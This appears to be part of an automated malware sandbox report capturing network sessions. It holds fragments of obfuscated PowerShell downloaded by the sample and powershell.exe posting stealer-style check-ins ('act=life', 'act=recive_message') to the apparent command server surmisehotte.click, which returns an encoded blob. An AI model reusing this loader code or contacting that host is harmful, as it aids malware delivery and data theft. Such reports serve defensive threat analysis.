                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 61 72 5d 5b 69 6e 74 5d 24 67 76 70 6f 46 78 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 51 66 74 6a 6b 47 50 76 67 71 4b 5a 45 79 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 63 45 6a 54 6c 74 49 4d 58 69 41 43 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 50 6c 4c 79 6b 4a 77 78 43 44 5a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4f 65 52 75 67 76 6b 41 4d 45 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 56 6a 58 61 63 6b 7a 54 42 76 70 52 65 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6c 63 7a 45 54 76 42 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 67 4f 78 51 4b 77 47 4e 55 4c 4d 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 50 6f 6b 78 44 65 53 52 42 5a 66 73 4a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 62 75 5a 4d 63 6a 61 20 2b 20 5b
                                                                                                                                                                                                                                                      Data Ascii: ar][int]$gvpoFx + [char][int]$QftjkGPvgqKZEy + [char][int]$cEjTltIMXiAC + [char][int]$PlLykJwxCDZ + [char][int]$OeRugvkAME + [char][int]$SVjXackzTBvpRe + [char][int]$lczETvB + [char][int]$gOxQKwGNULM + [char][int]$KPokxDeSRBZfsJ + [char][int]$SbuZMcja + [
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 77 4a 47 4c 6d 76 53 68 2d 31 32 2d 28 24 55 44 6d 63 77 2d 31 2d 28 24 55 52 64 6b 52 77 4a 47 4c 6d 76 53 68 2d 32 38 2d 39 29 29 29 2d 24 55 73 66 4b 6f 71 50 6a 54 4e 2d 34 36 2b 34 33 29 29 29 0d 0a 73 77 69 74 63 68 28 28 33 2b 31 38 2b 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 29 2d 28 33 34 2d 32 36 2d 24 5a 4f 43 6d 6a 55 6a 44 50 53 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 66 43 6f 51 58 6a 77 53 64 61 2d 31 36 2d 24 71 63 48 58 65 54 77 54 70 78 65 63 46 2d 34 2d 34 34 2d 24 66 6f 68 75 6a 7a 6f 42 4d 57 29 29 2b 28 28 24 51 55 56 4d 4c 78 6b 49 68 43 74 2d 33 39 2d 32 33 29 29 29 29 20 0d 0a 7b 0d 0a 24 76 48 58 71 55 59 79 63 20 3d 20 36 31 30 0d 0a 24 69 41 6e 54 61 77 20 3d 20 24 6c 42 43 54 5a 4c 63 73 77 76 72 53
                                                                                                                                                                                                                                                      Data Ascii: wJGLmvSh-12-($UDmcw-1-($URdkRwJGLmvSh-28-9)))-$UsfKoqPjTN-46+43)))switch((3+18+$lBCTZLcswvrSw)-(34-26-$ZOCmjUjDPSf)-(37-40-4)){(((($EfCoQXjwSda-16-$qcHXeTwTpxecF-4-44-$fohujzoBMW))+(($QUVMLxkIhCt-39-23)))) {$vHXqUYyc = 610$iAnTaw = $lBCTZLcswvrS


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      2192.168.11.2049756104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:21 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                      2024-12-21 20:06:22 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:22 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=va3ssoim07qhm9phne3nth824u; expires=Wed, 16 Apr 2025 13:53:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHfB%2FPttGYeNd8L9itW%2FSb%2FK2N3roE8zu8byf6eVFNBnosofF96%2B40l9gVOGy%2FAjjFqucrQf0fAqkinsr4GKpVKEWdnnPmfV0I4IOev2Ir4MXMafTBikBXfGmyYChcysQkO5yUc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e006b69a570-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=130062&min_rtt=129987&rtt_var=27540&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=29405&cwnd=252&unsent_bytes=0&cid=e6b4d1cd3ba5c817&ts=980&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                                      2024-12-21 20:06:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      3192.168.11.2049757104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:23 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 48
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:23 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 26 6a 3d
                                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--singl6&j=
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:24 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=t86e3j6l4rsr7ku4729f7unhog; expires=Wed, 16 Apr 2025 13:53:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2BI3ebE7JWZQulyTeyjG5AdrE%2FhhOi8lCsAHuUTckREN%2BIWKaFaY1x6HyGEmOmqDeetVywcJ7EX5zGBmMzNUW0YbTFE%2FUQUQsHC8v%2Fr3%2FpIuswMg4iNlDK2v02V%2B7tzOJPSXmn8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e0e8a6821fd-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129309&min_rtt=129214&rtt_var=27412&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=950&delivery_rate=29557&cwnd=252&unsent_bytes=0&cid=e4477dbdef6c1dd6&ts=709&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC230INData Raw: 34 39 31 63 0d 0a 64 70 74 75 73 72 36 6b 6c 50 45 4a 57 75 6c 31 35 56 6c 74 44 47 32 59 66 79 57 2f 53 38 47 54 43 6d 6b 6f 57 44 6b 2f 62 59 38 4e 75 52 69 51 68 4a 43 34 30 33 6f 2f 79 30 2b 52 4b 78 68 70 51 62 6f 65 51 5a 31 78 70 2f 4a 6d 47 6b 31 30 47 30 6b 41 72 55 7a 39 44 39 37 4e 77 62 6a 54 62 43 4c 4c 54 37 34 69 54 32 6b 44 75 6b 55 48 32 69 47 6a 38 6d 59 4c 53 54 4e 57 54 77 48 73 48 76 63 4a 32 74 76 48 38 4a 42 6c 4e 34 77 51 67 44 67 48 59 67 54 31 46 30 69 64 5a 2b 50 32 63 45 73 53 65 6e 52 61 47 65 34 37 2b 68 33 5a 6e 4e 6d 34 69 69 73 2f 68 31 66 66 65 77 78 70 44 2f 51 5a 51 64 51 6a 71 66 74 75 43 6b 77 79 53 56 59 4c 35 78 37 35 43 74 76 52 7a 75 53 64
                                                                                                                                                                                                                                                      Data Ascii: 491cdptusr6klPEJWul15VltDG2YfyW/S8GTCmkoWDk/bY8NuRiQhJC403o/y0+RKxhpQboeQZ1xp/JmGk10G0kArUz9D97NwbjTbCLLT74iT2kDukUH2iGj8mYLSTNWTwHsHvcJ2tvH8JBlN4wQgDgHYgT1F0idZ+P2cEsSenRaGe47+h3ZnNm4iis/h1ffewxpD/QZQdQjqftuCkwySVYL5x75CtvRzuSd
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 62 7a 43 48 46 6f 6f 34 54 79 42 50 2f 51 55 48 68 57 6e 77 77 32 73 61 57 79 39 57 54 51 6d 74 43 37 63 56 6b 4e 76 4b 74 73 73 72 4d 49 63 5a 67 6a 67 41 61 51 37 36 44 30 6a 64 4b 71 76 35 62 41 46 46 4e 56 52 54 42 65 6f 63 38 41 76 66 32 38 37 77 6e 47 68 34 78 56 65 41 49 30 38 32 54 39 6f 4e 52 4e 34 39 72 75 41 6f 46 41 51 6a 47 31 6f 44 72 55 79 35 43 74 37 64 79 2f 61 42 59 7a 4f 41 45 70 55 77 42 6d 4d 43 2b 68 42 4e 30 69 71 6a 39 6d 49 42 52 54 42 66 55 41 4c 72 46 50 6c 4d 6e 70 7a 42 37 74 4d 7a 65 4b 67 53 6c 7a 77 44 65 45 33 41 58 56 69 54 4d 4f 50 32 5a 45 73 53 65 6c 4e 59 44 4f 34 66 39 67 2f 59 31 39 54 32 67 57 30 31 6a 67 57 42 50 67 46 6b 44 4f 67 58 53 64 73 71 71 76 70 68 44 6b 30 2b 47 78 4e 50 36 67 79 35 56 4a 44 39 79 2f 32
                                                                                                                                                                                                                                                      Data Ascii: bzCHFoo4TyBP/QUHhWnww2saWy9WTQmtC7cVkNvKtssrMIcZgjgAaQ76D0jdKqv5bAFFNVRTBeoc8Avf287wnGh4xVeAI082T9oNRN49ruAoFAQjG1oDrUy5Ct7dy/aBYzOAEpUwBmMC+hBN0iqj9mIBRTBfUALrFPlMnpzB7tMzeKgSlzwDeE3AXViTMOP2ZEsSelNYDO4f9g/Y19T2gW01jgWBPgFkDOgXSdsqqvphDk0+GxNP6gy5VJD9y/2
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 78 61 4e 4b 52 31 75 41 2b 67 52 54 64 73 6d 72 76 30 6f 52 51 6f 39 51 78 31 58 72 54 37 36 47 4e 50 57 68 4d 4f 51 5a 54 61 4d 41 63 63 6b 51 58 64 50 2f 52 45 48 68 57 6d 75 38 47 41 4e 57 44 56 57 58 67 48 6a 47 2f 77 44 32 4e 7a 47 2b 35 5a 76 4d 34 41 55 69 6a 38 64 5a 41 2f 79 47 45 62 58 49 2b 4f 2f 4b 41 78 53 65 67 4d 64 50 76 6f 66 75 7a 6e 54 30 73 6a 78 68 53 73 6e 78 51 37 48 50 41 4d 75 56 37 6f 51 54 39 67 73 72 50 42 69 42 55 38 77 56 31 55 42 37 67 62 32 43 4e 44 51 7a 76 79 65 5a 54 79 44 48 6f 77 77 43 57 34 4f 38 46 30 4a 6e 53 36 37 73 54 42 4c 66 6a 31 58 55 41 43 76 49 66 6f 43 33 74 76 51 74 6f 77 6c 49 63 73 51 69 33 74 58 4c 67 50 7a 48 55 7a 58 4c 61 50 32 5a 51 35 4a 50 56 68 51 43 4f 63 61 2f 67 6a 63 31 63 76 77 6b 32 77 38
                                                                                                                                                                                                                                                      Data Ascii: xaNKR1uA+gRTdsmrv0oRQo9Qx1XrT76GNPWhMOQZTaMAcckQXdP/REHhWmu8GANWDVWXgHjG/wD2NzG+5ZvM4AUij8dZA/yGEbXI+O/KAxSegMdPvofuznT0sjxhSsnxQ7HPAMuV7oQT9gsrPBiBU8wV1UB7gb2CNDQzvyeZTyDHowwCW4O8F0JnS67sTBLfj1XUACvIfoC3tvQtowlIcsQi3tXLgPzHUzXLaP2ZQ5JPVhQCOca/gjc1cvwk2w8
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 74 58 4c 67 54 50 45 31 47 64 4e 75 33 6f 4b 41 78 47 65 67 4d 64 42 75 51 47 39 77 4c 5a 30 63 44 2b 6c 47 55 31 67 42 47 4d 50 41 68 6f 41 76 49 51 51 74 34 6f 70 2f 74 36 43 45 45 77 56 6c 64 50 6f 31 54 2b 46 4a 43 45 68 74 47 66 51 69 69 51 42 5a 46 37 45 43 41 57 75 68 70 4c 6e 58 48 6a 38 6d 63 43 52 54 4a 54 55 67 44 70 47 76 38 4b 33 64 6e 4a 2f 49 46 6a 4e 6f 59 63 69 44 41 64 62 67 4c 2b 45 55 50 56 49 71 6d 78 4a 6b 74 4e 49 68 73 46 54 39 67 5a 39 67 7a 54 79 6f 62 70 33 58 4a 34 6a 42 76 48 59 30 39 69 41 66 6f 53 53 39 45 69 71 2f 42 6b 42 55 30 2f 55 6c 55 48 2f 78 58 39 42 4e 48 53 79 66 65 58 62 6a 32 50 45 49 4d 39 41 43 35 42 75 68 70 66 6e 58 48 6a 33 6b 38 2b 43 42 74 68 48 52 43 6a 44 62 6b 4c 33 4a 79 65 74 70 39 6f 4e 49 4d 59 67
                                                                                                                                                                                                                                                      Data Ascii: tXLgTPE1GdNu3oKAxGegMdBuQG9wLZ0cD+lGU1gBGMPAhoAvIQQt4op/t6CEEwVldPo1T+FJCEhtGfQiiQBZF7ECAWuhpLnXHj8mcCRTJTUgDpGv8K3dnJ/IFjNoYciDAdbgL+EUPVIqmxJktNIhsFT9gZ9gzTyobp3XJ4jBvHY09iAfoSS9Eiq/BkBU0/UlUH/xX9BNHSyfeXbj2PEIM9AC5BuhpfnXHj3k8+CBthHRCjDbkL3Jyetp9oNIMYg
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 50 6f 6c 31 4e 31 69 32 67 39 57 30 45 53 7a 74 64 54 77 6a 6b 42 76 63 42 33 39 54 4f 2f 35 4a 76 50 59 59 52 69 7a 45 4f 61 51 48 30 46 51 65 54 61 61 54 70 4b 46 4d 4b 47 30 74 47 48 66 73 5a 32 41 48 66 6e 4e 6d 34 69 69 73 2f 68 31 66 66 65 77 5a 38 43 2f 63 50 54 74 6f 6e 72 50 4a 36 43 6b 63 78 53 56 6f 41 36 52 50 31 43 74 2f 61 78 2f 4f 5a 5a 7a 2b 4f 48 49 67 33 54 79 42 50 2f 51 55 48 68 57 6d 4e 2b 6e 73 63 53 54 52 51 53 78 53 74 43 37 63 56 6b 4e 76 4b 74 73 73 72 4f 34 41 63 67 7a 73 44 62 67 76 33 48 56 58 53 4c 71 54 34 59 78 6c 41 50 56 78 57 42 2b 59 62 2f 78 37 63 30 74 54 7a 67 58 6c 34 78 56 65 41 49 30 38 32 54 38 77 61 56 38 30 71 34 63 42 2b 43 46 77 78 56 6c 46 50 38 6c 72 67 54 4e 66 51 68 71 37 54 62 54 65 43 46 49 67 36 42 6d
                                                                                                                                                                                                                                                      Data Ascii: Pol1N1i2g9W0ESztdTwjkBvcB39TO/5JvPYYRizEOaQH0FQeTaaTpKFMKG0tGHfsZ2AHfnNm4iis/h1ffewZ8C/cPTtonrPJ6CkcxSVoA6RP1Ct/ax/OZZz+OHIg3TyBP/QUHhWmN+nscSTRQSxStC7cVkNvKtssrO4AcgzsDbgv3HVXSLqT4YxlAPVxWB+Yb/x7c0tTzgXl4xVeAI082T8waV80q4cB+CFwxVlFP8lrgTNfQhq7TbTeCFIg6Bm
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 42 34 56 70 6d 2f 70 6d 4f 55 6b 68 47 30 4a 42 39 46 54 2b 41 4a 43 45 68 76 57 55 61 44 6d 42 48 6f 73 30 43 47 6f 64 38 42 70 56 33 43 69 6f 2f 47 51 4c 52 7a 64 52 58 41 62 67 47 50 51 4c 31 39 50 44 74 74 30 72 50 35 4e 58 33 33 73 75 59 77 54 32 52 68 32 64 4e 75 33 6f 4b 41 78 47 65 67 4d 64 44 2b 63 52 38 77 48 54 30 38 58 6b 6b 6d 30 71 69 78 71 4e 4b 51 56 6c 43 76 63 51 53 74 34 76 70 66 70 6b 47 55 4d 36 57 46 5a 50 6f 31 54 2b 46 4a 43 45 68 74 57 45 66 54 4b 4d 47 35 45 77 44 6d 30 5a 39 77 30 48 6b 32 6d 79 39 6e 6c 4c 45 69 78 4c 53 67 6a 79 57 75 42 4d 31 39 43 47 72 74 4e 74 4d 59 30 51 67 54 55 64 61 77 6e 31 45 6b 37 55 4c 61 76 79 61 41 39 4f 50 56 35 65 41 2b 59 54 2b 67 50 55 31 63 6a 2f 6e 43 74 32 79 78 43 66 65 31 63 75 4c 75 45
                                                                                                                                                                                                                                                      Data Ascii: B4Vpm/pmOUkhG0JB9FT+AJCEhvWUaDmBHos0CGod8BpV3Cio/GQLRzdRXAbgGPQL19PDtt0rP5NX33suYwT2Rh2dNu3oKAxGegMdD+cR8wHT08Xkkm0qixqNKQVlCvcQSt4vpfpkGUM6WFZPo1T+FJCEhtWEfTKMG5EwDm0Z9w0Hk2my9nlLEixLSgjyWuBM19CGrtNtMY0QgTUdawn1Ek7ULavyaA9OPV5eA+YT+gPU1cj/nCt2yxCfe1cuLuE
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 4b 4c 6a 61 77 49 4b 64 42 74 61 46 36 31 4d 75 53 7a 62 79 73 50 78 68 53 6b 4e 69 42 6d 4a 50 42 6b 75 45 4d 56 54 42 39 49 7a 34 36 6c 52 45 67 6f 39 56 78 31 58 72 51 48 2b 44 4e 66 47 30 50 47 66 65 6a 4f 47 47 36 55 30 43 48 67 4d 39 52 35 57 31 47 57 6f 2f 43 68 46 43 6a 31 44 48 56 65 74 4f 2f 34 61 30 2f 50 46 35 35 6f 72 64 73 73 51 6b 58 74 58 4c 6a 47 36 44 30 54 4e 4b 71 7a 67 56 6b 73 53 49 32 55 64 42 50 73 54 36 51 2f 47 31 38 76 36 67 6c 56 34 30 30 50 56 61 56 30 38 58 65 56 64 57 4f 4a 6e 34 2f 41 6f 55 33 4d 6a 47 30 74 50 74 55 61 33 54 4d 4b 63 6e 72 62 55 61 43 71 5a 45 59 51 74 44 43 6b 78 78 44 70 52 31 79 36 7a 39 6e 38 45 43 6e 51 62 55 6b 2b 31 4c 62 6b 46 31 38 66 58 34 4a 35 37 50 38 73 6f 79 58 73 58 4c 6c 65 36 4b 45 54 54
                                                                                                                                                                                                                                                      Data Ascii: KLjawIKdBtaF61MuSzbysPxhSkNiBmJPBkuEMVTB9Iz46lREgo9Vx1XrQH+DNfG0PGfejOGG6U0CHgM9R5W1GWo/ChFCj1DHVetO/4a0/PF55ordssQkXtXLjG6D0TNKqzgVksSI2UdBPsT6Q/G18v6glV400PVaV08XeVdWOJn4/AoU3MjG0tPtUa3TMKcnrbUaCqZEYQtDCkxxDpR1y6z9n8ECnQbUk+1LbkF18fX4J57P8soyXsXLle6KETT
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 6f 5a 54 44 6c 4e 58 6b 6a 54 4b 76 67 42 33 35 44 49 2f 5a 4e 73 4b 4a 30 4d 79 7a 4d 4d 64 42 58 45 49 32 7a 52 4c 36 54 72 62 77 31 73 47 68 73 54 54 2b 4a 55 6f 54 57 51 6c 49 62 4a 33 53 73 67 79 30 2f 48 44 67 78 67 41 66 30 4c 56 70 41 42 67 4d 74 53 53 57 59 39 54 68 38 37 36 67 54 6f 42 39 33 51 68 72 6a 54 62 58 6a 54 52 38 6c 37 43 33 39 50 6f 6b 30 56 68 6e 7a 77 70 6a 68 5a 56 58 52 43 48 52 6d 74 54 4b 74 43 6b 4d 36 47 72 74 4d 73 4f 35 6b 46 67 54 67 5a 62 55 6a 45 49 32 44 54 4c 71 4c 6e 65 42 78 46 42 47 56 49 44 4f 4d 61 2f 68 72 42 6e 49 69 32 6e 43 74 67 73 6c 66 50 65 7a 41 67 54 2b 4a 64 48 35 30 63 6f 50 39 6d 44 46 77 72 46 6e 6f 42 36 68 58 76 48 4d 66 54 68 72 6a 54 62 58 6a 54 52 63 6c 37 43 33 39 50 6f 6b 30 56 68 6e 7a 77 70
                                                                                                                                                                                                                                                      Data Ascii: oZTDlNXkjTKvgB35DI/ZNsKJ0MyzMMdBXEI2zRL6Trbw1sGhsTT+JUoTWQlIbJ3Ssgy0/HDgxgAf0LVpABgMtSSWY9Th876gToB93QhrjTbXjTR8l7C39Pok0VhnzwpjhZVXRCHRmtTKtCkM6GrtMsO5kFgTgZbUjEI2DTLqLneBxFBGVIDOMa/hrBnIi2nCtgslfPezAgT+JdH50coP9mDFwrFnoB6hXvHMfThrjTbXjTRcl7C39Pok0Vhnzwp
                                                                                                                                                                                                                                                      2024-12-21 20:06:24 UTC1369INData Raw: 33 58 6c 4d 49 72 7a 58 7a 48 4e 33 54 77 62 53 7a 62 43 36 49 56 38 6c 37 41 79 35 58 75 68 78 4e 7a 53 53 73 39 69 51 4d 55 44 30 62 45 30 2f 6a 56 4b 46 4d 30 64 62 57 2b 35 78 73 64 49 30 5a 69 58 73 51 49 42 61 36 43 77 65 46 65 75 32 78 65 6b 73 53 65 68 78 65 48 66 38 53 2b 68 72 54 6d 2f 6a 49 76 6e 6b 2f 6d 78 54 46 43 67 4a 71 47 65 38 65 56 39 6f 58 6e 64 78 36 44 46 6f 35 47 57 77 5a 37 68 54 33 43 35 43 53 68 75 37 54 4d 33 69 6d 42 59 41 72 44 43 35 42 75 68 45 48 68 57 6d 75 34 32 38 62 53 58 5a 63 52 77 69 74 43 37 63 56 6b 4d 71 47 72 73 41 6c 65 4a 6c 58 33 33 74 49 59 41 4c 37 48 6b 6e 65 4f 37 48 33 61 78 31 4a 66 57 56 6a 49 76 38 54 36 51 2b 53 37 63 76 79 68 58 34 37 6d 78 43 35 42 53 4a 38 43 4f 6f 65 42 66 45 75 72 76 31 57 4e 58
                                                                                                                                                                                                                                                      Data Ascii: 3XlMIrzXzHN3TwbSzbC6IV8l7Ay5XuhxNzSSs9iQMUD0bE0/jVKFM0dbW+5xsdI0ZiXsQIBa6CweFeu2xeksSehxeHf8S+hrTm/jIvnk/mxTFCgJqGe8eV9oXndx6DFo5GWwZ7hT3C5CShu7TM3imBYArDC5BuhEHhWmu428bSXZcRwitC7cVkMqGrsAleJlX33tIYAL7HkneO7H3ax1JfWVjIv8T6Q+S7cvyhX47mxC5BSJ8COoeBfEurv1WNX


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      4192.168.11.2049761172.217.15.1964438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:27 UTC807OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                                                                      2024-12-21 20:06:28 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:28 GMT
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-J5MPqf-HGkEJ-jf0KumSRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
